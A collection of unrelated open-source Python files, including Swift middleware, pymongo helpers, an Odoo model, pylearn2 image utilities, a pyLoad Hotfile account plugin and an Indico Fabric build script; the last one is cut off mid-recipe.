body='An error occurred',
content_type='text/plain')
resp.headers['X-Trans-Id'] = trans_id
return resp(env, start_response)
# make sure the response has the trans_id
if self._response_headers is None:
self._response_headers = []
self._response_headers.append(('X-Trans-Id', trans_id))
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
class CatchErrorMiddleware(object):
"""
Middleware that provides high-level error handling and ensures that a
transaction id will be set for every request.
"""
def __init__(self, app, conf):
self.app = app
self.logger = get_logger(conf, log_route='catch-errors')
self.trans_id_suffix = conf.get('trans_id_suffix', '')
def __call__(self, env, start_response):
"""
If used, this should be the first middleware in pipeline.
"""
context = CatchErrorsContext(self.app,
self.logger,
self.trans_id_suffix)
return context.handle_request(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def except_filter(app):
return CatchErrorMiddleware(app, conf)
return except_filter
|
# Copyright 2009-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bits and pieces used by the driver that don't really fit elsewhere."""
try:
import hashlib
_md5func = hashlib.md5
except: # for Python < 2.5
import md5
_md5func = md5.new
import random
import struct
import bson
import pymongo
from bson.binary import OLD_UUID_SUBTYPE
from bson.son import SON
from pymongo.errors import (AutoReconnect,
OperationFailure,
TimeoutError)
def _index_list(key_or_list, direction=None):
"""Helper to generate a list of (key, direction) pairs.
Takes such a list, or a single key, or a single key and direction.
"""
if direction is not None:
return [(key_or_list, direction)]
else:
if isinstance(key_or_list, basestring):
return [(key_or_list, pymongo.ASCENDING)]
elif not isinstance(key_or_list, list):
raise TypeError("if no direction is specified, "
"key_or_list must be an instance of list")
return key_or_list
def _index_document(index_list):
"""Helper to generate an index specifying document.
Takes a list of (key, direction) pairs.
"""
if isinstance(index_list, dict):
raise TypeError("passing a dict to sort/create_index/hint is not "
"allowed - use a list of tuples instead. did you "
"mean %r?" % list(index_list.iteritems()))
elif not isinstance(index_list, list):
raise TypeError("must use a list of (key, direction) pairs, "
"not: " + repr(index_list))
if not len(index_list):
raise ValueError("key_or_list must not be the empty list")
index = SON()
for (key, value) in index_list:
if not isinstance(key, basestring):
raise TypeError("first item in each key pair must be a string")
if value not in [pymongo.ASCENDING, pymongo.DESCENDING, pymongo.GEO2D, pymongo.GEOHAYSTACK]:
raise TypeError("second item in each key pair must be ASCENDING, "
"DESCENDING, GEO2D, or GEOHAYSTACK")
index[key] = value
return index
def _unpack_response(response, cursor_id=None,
as_class=dict, tz_aware=False, uuid_subtype=OLD_UUID_SUBTYPE):
"""Unpack a response from the database.
Check the response for errors and unpack, returning a dictionary
containing the response data.
:Parameters:
- `response`: byte string as returned from the database
- `cursor_id` (optional): cursor_id we sent to get this response -
used for raising an informative exception when we get cursor id not
valid at server response
- `as_class` (optional): class to use for resulting documents
"""
response_flag = struct.unpack("<i", response[:4])[0]
if response_flag & 1:
# Shouldn't get this response if we aren't doing a getMore
assert cursor_id is not None
raise OperationFailure("cursor id '%s' not valid at server" %
cursor_id)
elif response_flag & 2:
error_object = bson.BSON(response[20:]).decode()
if error_object["$err"].startswith("not master"):
raise AutoReconnect("master has changed")
raise OperationFailure("database error: %s" %
error_object["$err"])
result = {}
result["cursor_id"] = struct.unpack("<q", response[4:12])[0]
result["starting_from"] = struct.unpack("<i", response[12:16])[0]
result["number_returned"] = struct.unpack("<i", response[16:20])[0]
result["data"] = bson.decode_all(response[20:],
as_class, tz_aware, uuid_subtype)
assert len(result["data"]) == result["number_returned"]
return result
def _check_command_response(response, reset, msg="%s", allowable_errors=[]):
if not response["ok"]:
if "wtimeout" in response and response["wtimeout"]:
raise TimeoutError(msg % response["errmsg"])
details = response
# Mongos returns the error details in a 'raw' object
# for some errors.
if "raw" in response:
for shard in response["raw"].itervalues():
if not shard.get("ok"):
# Just grab the first error...
details = shard
break
if not details["errmsg"] in allowable_errors:
if details["errmsg"] == "not master":
if reset is not None:
reset()
raise AutoReconnect("not master")
if details["errmsg"] == "db assertion failure":
ex_msg = ("db assertion failure, assertion: '%s'" %
details.get("assertion", ""))
if "assertionCode" in details:
ex_msg += (", assertionCode: %d" %
(details["assertionCode"],))
raise OperationFailure(ex_msg, details.get("assertionCode"))
raise OperationFailure(msg % details["errmsg"])
def _password_digest(username, password):
"""Get a password digest to use for authentication.
"""
if not isinstance(password, basestring):
raise TypeError("password must be an instance "
"of %s" % (basestring.__name__,))
if not isinstance(username, basestring):
raise TypeError("username must be an instance "
"of %s" % (basestring.__name__,))
md5hash = _md5func()
data = "%s:mongo:%s" % (username, password)
md5hash.update(data.encode('utf-8'))
return unicode(md5hash.hexdigest())
def _auth_key(nonce, username, password):
"""Get an auth key to use for authentication.
"""
digest = _password_digest(username, password)
md5hash = _md5func()
data = "%s%s%s" % (nonce, unicode(username), digest)
md5hash.update(data.encode('utf-8'))
return unicode(md5hash.hexdigest())
def _fields_list_to_dict(fields):
"""Takes a list of field names and returns a matching dictionary.
["a", "b"] becomes {"a": 1, "b": 1}
and
["a.b.c", "d", "a.c"] becomes {"a.b.c": 1, "d": 1, "a.c": 1}
"""
as_dict = {}
for field in fields:
if not isinstance(field, basestring):
raise TypeError("fields must be a list of key names, "
"each an instance of %s" % (basestring.__name__,))
as_dict[field] = 1
return as_dict
def shuffled(sequence):
"""Returns a copy of the sequence (as a :class:`list`) which has been
shuffled by :func:`random.shuffle`.
"""
out = list(sequence)
random.shuffle(out)
return out
|
# -*- coding: utf-8 -*-
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import api, fields, models
class ExternalSyncBatchMember(models.Model):
_description = 'External Sync Batch Member'
_name = 'clv.external_sync.batch.member'
_order = "sequence"
external_sync_batch_id = fields.Many2one(
comodel_name='clv.external_sync.batch',
string='External Sync Batch ',
required=False
)
notes = fields.Text(string='Notes')
sequence = fields.Integer(
string='Sequence',
default=10
)
class ExternalSyncBatch(models.Model):
_inherit = 'clv.external_sync.batch'
external_sync_batch_member_ids = fields.One2many(
comodel_name='clv.external_sync.batch.member',
inverse_name='external_sync_batch_id',
string='Members',
readonly=False
)
count_external_sync_batch_members = fields.Integer(
string='Number of Members',
compute='_compute_count_external_sync_batch_members',
store=False
)
@api.depends('external_sync_batch_member_ids')
def _compute_count_external_sync_batch_members(self):
for r in self:
r.count_external_sync_batch_members = len(r.external_sync_batch_member_ids)
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2018 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
"""Literature suggestion form testlib."""
from __future__ import absolute_import, division, print_function
class AuthorFormInputData(object):
def __init__(
self,
given_names,
research_field,
status='active',
family_name=None,
display_name=None
):
self.given_names = given_names
self.family_name = family_name
self.display_name = display_name
self.status = status
self.research_field = research_field
def request_data(self):
formdata = {
'given_names': self.given_names,
'family_name': self.family_name,
'display_name': self.display_name,
'status': self.status,
'research_field': self.research_field,
}
return formdata
class AuthorFormApiClient(object):
SUBMIT_AUTHOR_FORM_URL = '/authors/new/submit'
def __init__(self, client):
self._client = client
def submit(self, form_input_data):
response = self._client.post(
self.SUBMIT_AUTHOR_FORM_URL,
data=form_input_data.request_data()
)
response.raise_for_status()
return response
|
"""
.. todo::
WRITEME
"""
import logging
import numpy as np
plt = None
axes = None
from theano.compat.six.moves import xrange
import warnings
try:
import matplotlib.pyplot as plt
import matplotlib.axes
except (RuntimeError, ImportError) as matplotlib_exception:
warnings.warn("Unable to import matplotlib. Some features unavailable. "
"Original exception: " + str(matplotlib_exception))
import os
try:
from PIL import Image
except ImportError:
Image = None
from pylearn2.utils import string_utils as string
from pylearn2.utils.exc import reraise_as
from tempfile import mkstemp
from multiprocessing import Process
import subprocess
logger = logging.getLogger(__name__)
def ensure_Image():
"""Makes sure Image has been imported from PIL"""
global Image
if Image is None:
raise RuntimeError("You are trying to use PIL-dependent functionality"
" but don't have PIL installed.")
def imview(*args, **kwargs):
"""
A more sensible matplotlib-based image viewer command,
a wrapper around `matplotlib.pyplot.imshow`.
Parameters are identical to `matplotlib.pyplot.imshow`
but this behaves somewhat differently:
* By default, it creates a new figure (unless a
`figure` keyword argument is supplied.
* It modifies the axes of that figure to use the
full frame, without ticks or tick labels.
* It turns on `nearest` interpolation by default
(i.e., it does not antialias pixel data). This
can be overridden with the `interpolation`
argument as in `imshow`.
All other arguments and keyword arguments are passed
on to `imshow`.`
"""
if 'figure' not in kwargs:
f = plt.figure()
else:
f = kwargs['figure']
new_ax = matplotlib.axes.Axes(f,
[0, 0, 1, 1],
xticks=[],
yticks=[],
frame_on=False)
f.delaxes(f.gca())
f.add_axes(new_ax)
if len(args) < 5 and 'interpolation' not in kwargs:
kwargs['interpolation'] = 'nearest'
plt.imshow(*args, **kwargs)
def imview_async(*args, **kwargs):
"""
A version of `imview` that forks a separate process and
immediately shows the image.
Supports the `window_title` keyword argument to cope with
the title always being 'Figure 1'.
Returns the `multiprocessing.Process` handle.
"""
if 'figure' in kwargs:
raise ValueError("passing a figure argument not supported")
def fork_image_viewer():
f = plt.figure()
kwargs['figure'] = f
imview(*args, **kwargs)
if 'window_title' in kwargs:
f.set_window_title(kwargs['window_title'])
plt.show()
p = Process(None, fork_image_viewer)
p.start()
return p
def show(image):
"""
.. todo::
WRITEME
Parameters
----------
image : PIL Image object or ndarray
If ndarray, integer formats are assumed to use 0-255
and float formats are assumed to use 0-1
"""
viewer_command = string.preprocess('${PYLEARN2_VIEWER_COMMAND}')
if viewer_command == 'inline':
return imview(image)
if hasattr(image, '__array__'):
#do some shape checking because PIL just raises a tuple indexing error
#that doesn't make it very clear what the problem is
if len(image.shape) < 2 or len(image.shape) > 3:
raise ValueError('image must have either 2 or 3 dimensions but its'
' shape is ' + str(image.shape))
if image.dtype == 'int8':
image = np.cast['uint8'](image)
elif str(image.dtype).startswith('float'):
#don't use *=, we don't want to modify the input array
image = image * 255.
image = np.cast['uint8'](image)
#PIL is too stupid to handle single-channel arrays
if len(image.shape) == 3 and image.shape[2] == 1:
image = image[:,:,0]
try:
ensure_Image()
image = Image.fromarray(image)
except TypeError:
reraise_as(TypeError("PIL issued TypeError on ndarray of shape " +
str(image.shape) + " and dtype " +
str(image.dtype)))
# Create a temporary file with the suffix '.png'.
fd, name = mkstemp(suffix='.png')
os.close(fd)
# Note:
# Although we can use tempfile.NamedTemporaryFile() to create
# a temporary file, the function should be used with care.
#
# In Python earlier than 2.7, a temporary file created by the
# function will be deleted just after the file is closed.
# We can re-use the name of the temporary file, but there is an
# instant where a file with the name does not exist in the file
# system before we re-use the name. This may cause a race
# condition.
#
# In Python 2.7 or later, tempfile.NamedTemporaryFile() has
# the 'delete' argument which can control whether a temporary
# file will be automatically deleted or not. With the argument,
# the above race condition can be avoided.
#
image.save(name)
if os.name == 'nt':
subprocess.Popen(viewer_command + ' ' + name +' && del ' + name,
shell=True)
else:
subprocess.Popen(viewer_command + ' ' + name +' ; rm ' + name,
shell=True)
def pil_from_ndarray(ndarray):
"""
.. todo::
WRITEME
"""
try:
if ndarray.dtype == 'float32' or ndarray.dtype == 'float64':
assert ndarray.min() >= 0.0
assert ndarray.max() <= 1.0
ndarray = np.cast['uint8'](ndarray * 255)
if len(ndarray.shape) == 3 and ndarray.shape[2] == 1:
ndarray = ndarray[:, :, 0]
ensure_Image()
rval = Image.fromarray(ndarray)
return rval
except Exception as e:
logger.exception('original exception: ')
logger.exception(e)
logger.exception('ndarray.dtype: {0}'.format(ndarray.dtype))
logger.exception('ndarray.shape: {0}'.format(ndarray.shape))
raise
assert False
def ndarray_from_pil(pil, dtype='uint8'):
"""
.. todo::
WRITEME
"""
rval = np.asarray(pil)
if dtype != rval.dtype:
rval = np.cast[dtype](rval)
if str(dtype).startswith('float'):
rval /= 255.
if len(rval.shape) == 2:
rval = rval.reshape(rval.shape[0], rval.shape[1], 1)
return rval
def rescale(image, shape):
"""
Scales image to be no larger than shape. PIL might give you
unexpected results beyond that.
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3 # rows, cols, channels
assert len(shape) == 2 # rows, cols
i = pil_from_ndarray(image)
ensure_Image()
i.thumbnail([shape[1], shape[0]], Image.ANTIALIAS)
rval = ndarray_from_pil(i, dtype=image.dtype)
return rval
resize = rescale
def fit_inside(image, shape):
"""
Scales image down to fit inside shape preserves proportions of image
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3 # rows, cols, channels
assert len(shape) == 2 # rows, cols
if image.shape[0] <= shape[0] and image.shape[1] <= shape[1]:
return image.copy()
row_ratio = float(image.shape[0]) / float(shape[0])
col_ratio = float(image.shape[1]) / float(shape[1])
if row_ratio > col_ratio:
target_shape = [shape[0], min(image.shape[1] / row_ratio, shape[1])]
else:
target_shape = [min(image.shape[0] / col_ratio, shape[0]), shape[1]]
assert target_shape[0] <= shape[0]
assert target_shape[1] <= shape[1]
assert target_shape[0] == shape[0] or target_shape[1] == shape[1]
rval = rescale(image, target_shape)
return rval
def letterbox(image, shape):
"""
Pads image with black letterboxing to bring image.shape up to shape
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3 # rows, cols, channels
assert len(shape) == 2 # rows, cols
assert image.shape[0] <= shape[0]
assert image.shape[1] <= shape[1]
if image.shape[0] == shape[0] and image.shape[1] == shape[1]:
return image.copy()
rval = np.zeros((shape[0], shape[1], image.shape[2]), dtype=image.dtype)
rstart = (shape[0] - image.shape[0]) / 2
cstart = (shape[1] - image.shape[1]) / 2
rend = rstart + image.shape[0]
cend = cstart + image.shape[1]
rval[rstart:rend, cstart:cend] = image
return rval
def make_letterboxed_thumbnail(image, shape):
"""
Scales image down to shape. Preserves proportions of image, introduces
black letterboxing if necessary.
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3
assert len(shape) == 2
shrunk = fit_inside(image, shape)
letterboxed = letterbox(shrunk, shape)
return letterboxed
def load(filepath, rescale_image=True, dtype='float64'):
"""
.. todo::
WRITEME
"""
assert type(filepath) == str
if rescale_image == False and dtype == 'uint8':
ensure_Image()
rval = np.asarray(Image.open(filepath))
# print 'image.load: ' + str((rval.min(), rval.max()))
assert rval.dtype == 'uint8'
return rval
s = 1.0
if rescale_image:
s = 255.
try:
ensure_Image()
rval = Image.open(filepath)
except Exception:
reraise_as(Exception("Could not open " + filepath))
numpy_rval = np.array(rval)
if numpy_rval.ndim not in [2,3]:
logger.error(dir(rval))
logger.error(rval)
logger.error(rval.size)
rval.show()
raise AssertionError("Tried to load an image, got an array with " +
str(numpy_rval.ndim)+" dimensions. Expected 2 or 3."
"This may indicate a mildly corrupted image file. Try "
"converting it to a different image format with a different "
"editor like gimp or imagemagic. Sometimes these programs are "
"more robust to minor corruption than PIL and will emit a "
"correctly formatted image in the new format."
)
rval = numpy_rval
rval = np.cast[dtype](rval) / s
if rval.ndim == 2:
rval = rval.reshape(rval.shape[0], rval.shape[1], 1)
if rval.ndim != 3:
raise AssertionError("Something went wrong opening " +
filepath + '. Resulting shape is ' +
str(rval.shape) +
" (it's meant to have 3 dimensions by now)")
return rval
def save(filepath, ndarray):
"""
.. todo::
WRITEME
"""
pil_from_ndarray(ndarray).save(filepath)
def scale_to_unit_interval(ndar, eps=1e-8):
"""
Scales all values in the ndarray ndar to be between 0 and 1
Parameters
----------
ndar : WRITEME
eps : WRITEME
Returns
-------
WRITEME
"""
ndar = ndar.copy()
ndar -= ndar.min()
ndar *= 1.0 / (ndar.max() + eps)
return ndar
def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True,
output_pixel_vals=True):
"""
Transform an array with one flattened image per row, into an array in
which images are reshaped and layed out like tiles on a floor.
This function is useful for visualizing datasets whose rows are images,
and also columns of matrices for transforming those rows
(such as the first layer of a neural net).
Parameters
----------
x : numpy.ndarray
2-d ndarray or 4 tuple of 2-d ndarrays or None for channels,
in which every row is a flattened image.
shape : 2-tuple of ints
The first component is the height of each image,
the second component is the width.
tile_shape : 2-tuple of ints
The number of images to tile in (row, columns) form.
scale_rows_to_unit_interval : bool
Whether or not the values need to be before being plotted to [0, 1].
output_pixel_vals : bool
Whether or not the output should be pixel values (int8) or floats.
Returns
-------
y : 2d-ndarray
The return value has the same dtype as X, and is suitable for
viewing as an image with PIL.Image.fromarray.
"""
assert len(img_shape) == 2
assert len(tile_shape) == 2
assert len(tile_spacing) == 2
# The expression below can be re-written in a more C style as
# follows :
#
# out_shape = [0,0]
# out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -
# tile_spacing[0]
# out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -
# tile_spacing[1]
out_shape = [(ishp + tsp) * tshp - tsp for ishp, tshp, tsp
in zip(img_shape, tile_shape, tile_spacing)]
if isinstance(X, tuple):
assert len(X) == 4
# Create an output np ndarray to store the image
if output_pixel_vals:
out_array = np.zeros((out_shape[0], out_shape[1], 4),
dtype='uint8')
else:
out_array = np.zeros((out_shape[0], out_shape[1], 4),
dtype=X.dtype)
#colors default to 0, alpha defaults to 1 (opaque)
if output_pixel_vals:
channel_defaults = [0, 0, 0, 255]
else:
channel_defaults = [0., 0., 0., 1.]
for i in xrange(4):
if X[i] is None:
# if channel is None, fill it with zeros of the correct
# dtype
dt = out_array.dtype
if output_pixel_vals:
dt = 'uint8'
out_array[:, :, i] = np.zeros(out_shape, dtype=dt) + \
channel_defaults[i]
else:
# use a recurrent call to compute the channel and store it
# in the output
out_array[:, :, i] = tile_raster_images(
X[i], img_shape, tile_shape, tile_spacing,
scale_rows_to_unit_interval, output_pixel_vals)
return out_array
else:
# if we are dealing with only one channel
H, W = img_shape
Hs, Ws = tile_spacing
# generate a matrix to store the output
dt = X.dtype
if output_pixel_vals:
dt = 'uint8'
out_array = np.zeros(out_shape, dtype=dt)
for tile_row in xrange(tile_shape[0]):
for tile_col in xrange(tile_shape[1]):
if tile_row * tile_shape[1] + tile_col < X.shape[0]:
this_x = X[tile_row * tile_shape[1] + tile_col]
if scale_rows_to_unit_interval:
# if we should scale values to be between 0 and 1
# do this by calling the `scale_to_unit_interval`
# function
this_img = scale_to_unit_interval(
this_x.reshape(img_shape))
else:
this_img = this_x.reshape(img_shape)
# add the slice to the corresponding position in the
# output array
c = 1
if output_pixel_vals:
c = 255
out_array[
tile_row * (H + Hs): tile_row * (H + Hs) + H,
tile_col * (W + Ws): tile_col * (W + Ws) + W
] = this_img * c
return out_array
if __name__ == '__main__':
black = np.zeros((50, 50, 3), dtype='uint8')
red = black.copy()
red[:, :, 0] = 255
green = black.copy()
green[:, :, 1] = 255
show(black)
show(green)
show(red)
|
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay, JoKoT3
"""
from time import strptime, mktime
import hashlib
from module.plugins.Account import Account
class HotfileCom(Account):
__name__ = "HotfileCom"
__version__ = "0.2"
__type__ = "account"
__description__ = """hotfile.com account plugin"""
__author_name__ = ("mkaay", "JoKoT3")
__author_mail__ = ("[email protected]", "[email protected]")
def loadAccountInfo(self, user, req):
resp = self.apiCall("getuserinfo", user=user)
if resp.startswith("."):
self.core.debug("HotfileCom API Error: %s" % resp)
raise Exception
info = {}
for p in resp.split("&"):
key, value = p.split("=")
info[key] = value
if info['is_premium'] == '1':
info["premium_until"] = info["premium_until"].replace("T", " ")
zone = info["premium_until"][19:]
info["premium_until"] = info["premium_until"][:19]
zone = int(zone[:3])
validuntil = int(mktime(strptime(info["premium_until"], "%Y-%m-%d %H:%M:%S"))) + (zone * 3600)
tmp = {"validuntil": validuntil, "trafficleft": -1, "premium": True}
elif info['is_premium'] == '0':
tmp = {"premium": False}
return tmp
def apiCall(self, method, post={}, user=None):
if user:
data = self.getAccountData(user)
else:
user, data = self.selectAccount()
req = self.getAccountRequest(user)
digest = req.load("http://api.hotfile.com/", post={"action": "getdigest"})
h = hashlib.md5()
h.update(data["password"])
hp = h.hexdigest()
h = hashlib.md5()
h.update(hp)
h.update(digest)
pwhash = h.hexdigest()
post.update({"action": method})
post.update({"username": user, "passwordmd5dig": pwhash, "digest": digest})
resp = req.load("http://api.hotfile.com/", post=post)
req.close()
return resp
def login(self, user, data, req):
cj = self.getAccountCookies(user)
cj.setCookie("hotfile.com", "lang", "en")
req.load("http://hotfile.com/", cookies=True)
page = req.load("http://hotfile.com/login.php", post={"returnto": "/", "user": user, "pass": data["password"]},
cookies=True)
if "Bad username/password" in page:
self.wrongPassword()
|
# -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
"""
fabfile for Indico development operations
"""
import os
import re
import sys
import glob
import shutil
import json
import getpass
from contextlib import contextmanager
from urlparse import urljoin
import operator
from fabric.api import local, lcd, task, env
from fabric.context_managers import prefix, settings
from fabric.colors import red, green, yellow, cyan
from fabric.contrib import console
ASSET_TYPES = ['js', 'sass', 'css']
DOC_DIRS = ['guides']
RECIPES = {}
env.conf = 'fabfile.conf'
env.src_dir = os.path.dirname(__file__)
execfile(env.conf, {}, env)
env.ext_dir = os.path.join(env.src_dir, env.ext_dirname)
env.target_dir = os.path.join(env.src_dir, env.target_dirname)
env.node_env_path = os.path.join(env.src_dir, env.node_env_dirname)
def recipe(name):
def _wrapper(f):
RECIPES[name] = f
return _wrapper
# Decorators
@contextmanager
def node_env():
if env.system_node:
yield
else:
# Ictp: with virtualenv return error
#with prefix('. {0}'.format(os.path.join(env.node_env_path, 'bin/activate'))):
yield
@contextmanager
def pyenv_env(version):
cmd_dir = os.path.join(env.pyenv_dir, 'versions', 'indico-build-{0}'.format(version), 'bin')
with prefix('PATH={0}:$PATH'.format(cmd_dir)):
yield
def pyenv_cmd(cmd, **kwargs):
cmd_dir = os.path.join(env.pyenv_dir, 'bin')
return local('{0}/pyenv {1}'.format(cmd_dir, cmd), **kwargs)
# Util functions
def create_node_env():
with settings(warn_only=True):
local('nodeenv -c -n {0} {1}'.format(env.node_version, env.node_env_path))
def lib_dir(src_dir, dtype):
target_dir = os.path.join(src_dir, 'indico', 'htdocs')
return os.path.join(target_dir, dtype, 'lib')
def _check_pyenv(py_versions):
"""
Check that pyenv is installed and set up the compilers/virtual envs
in case they do not exist
"""
if not os.path.isdir(env.pyenv_dir):
print red("Can't find pyenv!")
print yellow("Are you sure you have installed it?")
sys.exit(-2)
# list available pyenv versions
av_versions = list(entry.strip() for entry in pyenv_cmd('versions', capture=True).split('\n')[1:])
for py_version in py_versions:
if (py_version) not in av_versions:
print green('Installing Python {0}'.format(py_version))
pyenv_cmd('install {0}'.format(py_version), capture=True)
pyenv_cmd("virtualenv -f {0} indico-build-{0}".format(py_version))
def _check_present(executable, message="Please install it first."):
"""
Check that executable exists in $PATH
"""
with settings(warn_only=True):
if local('which {0} > /dev/null && echo $?'.format(executable), capture=True) != '0':
print red('{0} is not available in this system. {1}'.format(executable, message))
sys.exit(-2)
def _safe_rm(path, recursive=False, ask=True):
if path[0] != '/':
path = os.path.join(env.lcwd, path)
if ask:
files = glob.glob(path)
if files:
print yellow("The following files are going to be deleted:\n ") + '\n '.join(files)
if console.confirm(cyan("Are you sure you want to delete them?")):
local('rm {0}{1}'.format('-rf ' if recursive else '', path))
else:
print red("Delete operation cancelled")
else:
local('rm {0}{1}'.format('-rf ' if recursive else '', path))
def _cp_tree(dfrom, dto, exclude=[]):
"""
Simple copy with exclude option
"""
if dfrom[0] != '/':
dfrom = os.path.join(env.lcwd, dfrom)
if dto[0] != '/':
dto = os.path.join(env.lcwd, dto)
print "{0} -> {1}".format(dfrom, dto)
shutil.copytree(dfrom, dto, ignore=shutil.ignore_patterns(*exclude))
def _find_most_recent(path, cmp=operator.gt, maxt=0):
for dirpath, __, fnames in os.walk(path):
for fname in fnames:
# ignore hidden files and ODTs
if fname.startswith(".") or fname.endswith(".odt"):
continue
mtime = os.stat(os.path.join(dirpath, fname)).st_mtime
if cmp(mtime, maxt):
maxt = mtime
return maxt
def _find_least_recent(path):
return _find_most_recent(path, cmp=operator.lt, maxt=sys.maxint)
def _install_dependencies(mod_name, sub_path, dtype, dest_subpath=None):
l_dir = lib_dir(env.src_dir, dtype)
dest_dir = os.path.join(l_dir, dest_subpath) if dest_subpath else l_dir
local('mkdir -p {0}'.format(dest_dir))
local('cp -R {0} {1}/'.format(
os.path.join(env.ext_dir, mod_name, sub_path),
dest_dir))
# Recipes
@recipe('angular')
def install_angular():
"""
Install Angular.js from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'angular')):
local('npm install')
local('grunt clean buildall copy write compress')
dest_dir_js = lib_dir(env.src_dir, 'js')
dest_dir_css = lib_dir(env.src_dir, 'css')
local('mkdir -p {0}'.format(dest_dir_js))
local('cp build/angular.js {0}/'.format(dest_dir_js))
local('cp build/angular-resource.js {0}/'.format(dest_dir_js))
local('cp build/angular-sanitize.js {0}/'.format(dest_dir_js))
local('cp css/angular.css {0}'.format(dest_dir_css))
@recipe('ui-sortable')
def install_ui_sortable():
"""
Install angular ui-sortable from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'ui-sortable')):
dest_dir_js = lib_dir(env.src_dir, 'js')
local('mkdir -p {0}'.format(dest_dir_js))
local('cp src/sortable.js {0}/'.format(dest_dir_js))
@recipe('compass')
def install_compass():
"""
Install compass stylesheets from Git
"""
_install_dependencies('compass', 'frameworks/compass/stylesheets/*', 'sass', 'compass')
@recipe('jquery')
def install_jquery():
"""
Install jquery from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'jquery')):
local('npm install')
local('grunt')
dest_dir = lib_dir(env.src_dir, 'js')
local('mkdir -p {0}'.format(dest_dir))
local('cp dist/jquery.js {0}/'.format(dest_dir))
@recipe('underscore')
def install_underscore():
"""
Install jquery from Git
"""
_install_dependencies('underscore', 'underscore.js', 'js')
@recipe('qtip2')
def install_qtip2():
"""
Install qtip2 from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'qtip2')):
local('npm install')
local('grunt --plugins="tips modal viewport svg" init clean concat:dist concat:css concat:libs replace')
dest_dir_js, dest_dir_css = lib_dir(env.src_dir, 'js'), lib_dir(env.src_dir, 'css')
local('mkdir -p {0} {1}'.format(dest_dir_js, dest_dir_css))
local('cp dist/jquery.qtip.js {0}/'.format(dest_dir_js))
local('cp dist/jquery.qtip.css {0}/'.format(dest_dir_css))
@recipe('jquery-ui-multiselect')
def install_jquery_ui_multiselect():
"""
Install jquery ui multiselect widget from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'jquery-ui-multiselect')):
dest_dir_js = lib_dir(env.src_dir, 'js')
dest_dir_css = lib_dir(env.src_dir, 'css')
local('mkdir -p {0} {1}'.format(dest_dir_js, dest_dir_css))
local('cp src/jquery.multiselect.js {0}/'.format(dest_dir_js))
local('cp src/jquery.multiselect.filter.js {0}/'.format(dest_dir_js))
local('cp jquery.multiselect.css {0}/'.format(dest_dir_css))
local('cp jquery.multiselect.filter.css {0}/'.format(dest_dir_css))
@recipe('MathJax')
def install_mathjax():
"""
Install MathJax from Git
"""
dest_dir = os.path.join(lib_dir(env.src_dir, 'js'), 'mathjax/')
mathjax_js = os.path.join(dest_dir, 'MathJax.js')
with lcd(os.path.join(env.ext_dir, 'mathjax')):
local('rm -rf {0}'.format(os.path.join(dest_dir)))
_cp_tree('unpacked/', dest_dir, exclude=["AM*", "MML*", "Accessible*", "Safe*"])
_cp_tree('images/', os.path.join(dest_dir, 'images'))
_cp_tree('fonts/', os.path.join(dest_dir, 'fonts'), exclude=["png"])
with open(mathjax_js, 'r') as f:
data = f.read()
# Uncomment 'isPacked = true' line
data = re.sub(r'//\s*(MathJax\.isPacked\s*=\s*true\s*;)', r'\1', data, re.MULTILINE)
with open(mathjax_js, 'w') as f:
f.write(data)
@recipe('PageDown')
def install_pagedown():
"""
Install PageDown from Git (mirror!)
"""
with lcd(os.path.join(env.ext_dir, 'pagedown')):
